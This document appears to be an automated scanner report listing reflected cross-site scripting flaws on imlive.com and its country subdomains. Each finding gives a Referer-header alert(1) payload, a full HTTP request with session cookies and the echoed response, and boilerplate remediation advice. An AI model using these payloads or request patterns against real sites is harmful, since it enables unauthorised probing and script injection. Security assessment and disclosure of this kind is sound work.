<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html&lr=1107816008&ud=0&pe=sitemap.asp&rf=http://www.google.com/search?hl=en^q=4e210'><script>alert(1)</script>f3991d075f5&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 111ed'><script>alert(1)</script>4d6efbd9952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /videosfr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=111ed'><script>alert(1)</script>4d6efbd9952
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:48 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:47 GMT Connection: close Content-Length: 15789 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp&lr=1107816009&ud=0&pe=videosfr.asp&rf=http://www.google.com/search?hl=en^q=111ed'><script>alert(1)</script>4d6efbd9952&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff88f'><script>alert(1)</script>7d0fb5f5c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /warningms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ff88f'><script>alert(1)</script>7d0fb5f5c2
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:18 GMT Connection: close Content-Length: 14501 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad308'-alert(1)-'2250bef2d23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-advanced-search/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ad308'-alert(1)-'2250bef2d23
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:58 GMT Connection: close Content-Length: 74454 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... "text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=ad308'-alert(1)-'2250bef2d23&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fad7'-alert(1)-'8afcbd3f2d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-faq/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=2fad7'-alert(1)-'8afcbd3f2d9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5a5'-alert(1)-'88572b36594 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7f4'-alert(1)-'eebadb10194 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-sign-up/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=4f7f4'-alert(1)-'eebadb10194
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9d2b'-alert(1)-'d37559930d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wmaster.ashx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=f9d2b'-alert(1)-'d37559930d9
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1e0b'><script>alert(1)</script>829092c5393 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=a1e0b'><script>alert(1)</script>829092c5393
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbcb'-alert(1)-'3f0965cdc19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cbbcb'-alert(1)-'3f0965cdc19
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e4e'-alert(1)-'86c82395764 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=59e4e'-alert(1)-'86c82395764
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a33e'-alert(1)-'3a6e8f04043 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5a33e'-alert(1)-'3a6e8f04043
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b0b'-alert(1)-'74ef2eb4a5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=60b0b'-alert(1)-'74ef2eb4a5d
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3539e'-alert(1)-'9d756dfe67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3539e'-alert(1)-'9d756dfe67
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c88b2'-alert(1)-'2a63c42b092 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c88b2'-alert(1)-'2a63c42b092
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd73'-alert(1)-'7a8d4483e55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8dd73'-alert(1)-'7a8d4483e55
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71b4f'-alert(1)-'69efbaaf3ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=71b4f'-alert(1)-'69efbaaf3ed
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6e9'-alert(1)-'53afcdd47c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5d6e9'-alert(1)-'53afcdd47c4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c478e'-alert(1)-'b70284934ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c478e'-alert(1)-'b70284934ea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffa0b'-alert(1)-'f8b58c61969 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
